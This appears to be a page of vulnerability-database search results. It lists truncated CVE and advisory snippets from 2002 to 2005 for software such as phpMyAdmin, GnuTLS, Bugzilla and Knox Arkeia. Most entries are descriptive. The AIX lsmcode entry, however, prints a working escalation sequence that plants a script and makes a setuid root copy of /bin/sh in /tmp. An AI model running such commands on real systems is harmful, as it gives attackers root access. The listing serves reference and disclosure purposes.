CVE-2005-3439

Technical details about CVE-2005-3439 are not publicly available in the provided connected documents. Monitor for updates from official advisories and vendor notices.

Mandrake Linux Security Advisory : kdelibs (MDKSA-2005:085)

A buffer overflow in the PCX decoder of kimgio was discovered by Bruno Rohee. If an attacker could trick a user into loading a malicious PCX image with any KDE application, he could cause the execution of arbitrary code with the privileges of the user opening the image. The provided packages have...

GLSA-200505-04 : GnuTLS: Denial of Service vulnerability

The remote host is affected by the vulnerability described in GLSA-200505-04 GnuTLS: Denial of Service vulnerability A vulnerability has been discovered in the record packet parsing in the GnuTLS library. Additionally, a flaw was also found in the RSA key export functionality. Impact : A remote...

GnuTLS: Denial of Service vulnerability

Background GnuTLS is a free TLS 1.0 and SSL 3.0 implementation for the GNU project. Description A vulnerability has been discovered in the record packet parsing in the GnuTLS library. Additionally, a flaw was also found in the RSA key export functionality. Impact A remote attacker could exploit...

DEBIAN-CVE-2005-0544

phpMyAdmin 2.6.1 allows remote attackers to obtain the full path of the server via direct requests to 1 sqlvalidator.lib.php, 2 sqlparser.lib.php, 3 selecttheme.lib.php, 4 selectlang.lib.php, 5 relationcleanup.lib.php, 6 headermetastyle.inc.php, 7 getforeign.lib.php, 8 displaytbllinks.lib.php, 9...

CVE-2005-0700

The exportindex action in myadmin.php for Aztek Forum 4.0 allows remote attackers to obtain database files, possibly by setting the ATKADMIN cookie...

CVE-2004-1634

The CVE-2004-1634 entry concerns Bugzilla. Affected versions are Bugzilla 2.17.1 through 2.18rc2 and 2.19 from CVS, where the insidergroup feature and XML export of a bug can reveal private comments and attachment summaries. This exposes sensitive information to remote attackers. The underlying c...

Knox Arkeia Server Backup 5.3.x Remote Root Exploit

Exploit for multiple platform in category remote exploits =================================================== Knox Arkeia Server Backup 5.3.x Remote Root Exploit =================================================== / Knox Arkiea Server Backup arkiead local/remote root exploit Targets for Redhat...

Knox Arkeia Server Backup 5.3.x - Remote Code Execution

Knox Arkeia Server Backup 5.3.x - Remote Code Execution / Knox Arkiea Server Backup arkiead local/remote root exploit Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE Works up to current version 5.3.x --------------- Linux x86: ./arksink2 Exports an xterm to the box of your...

Knox Arkeia Server Backup 5.3.x - Remote Code Execution

/ Knox Arkiea Server Backup arkiead local/remote root exploit Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE Works up to current version 5.3.x --------------- Linux x86: ./arksink2 Exports an xterm to the box of your choosing. Make sure to "xhost +" on the box you're...

CVE-2004-0915

Multiple unknown vulnerabilities in viewcvs before 0.9.2, when exporting a repository as a tar archive, does not properly implement the hidecvsroot and forbidden settings, which could allow remote attackers to gain sensitive information...

AIX 4.35.1 5.3 - lsmcode Execution Privilege Escalation

AIX 4.35.1 5.3 - lsmcode Execution Privilege Escalation mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...

Security fix for the ALT Linux 5 package sudo version 1:1.6.7p5-alt4

Nov. 12, 2004 Dmitry V. Levin 1:1.6.7p5-alt4 - Backported upstream fix that restricts exporting of shell functions and CDPATH shell variable CAN-2004-1051. - Added help to control...

CVE-2004-1634

showbug.cgi in Bugzilla 2.17.1 through 2.18rc2 and 2.19 from CVS, when using the insidergroup feature and exporting a bug to XML, shows comments and attachment summaries which are marked as private, which allows remote attackers to gain sensitive information...

security flaw

Unknown vulnerability in Linux kernel 2.x may allow local users to modify the group ID of files, such as NFS exported files in kernel 2.4...

DEBIAN-CVE-2004-0129

Directory traversal vulnerability in export.php in phpMyAdmin 2.5.5 and earlier allows remote attackers to read arbitrary files via .. dot dot sequences in the what parameter...

phpMyAdmin255pl1.txt

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior Summary : phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW. There is a vulnerability in the current stable version of phpMyAdmin...

CVE-2003-1447

IBM WebSphere Advanced Server Edition 4.0.4 uses a weak encryption algorithm XOR and base64 encoding, which allows local users to decrypt passwords when the configuration file is exported to XML...

CVE-2002-0664

The default Access Control Lists ACLs of the administration database for ZMerge 4.x and 5.x provides arbitrary users including anonymous users with Manager level access, which allows the users to read or modify import/export scripts...

Извлечение криптографических ключей из IBM 4758 (unauthorized access)

Существует возможность экспорта DES/3DES ключей при определенных условиях...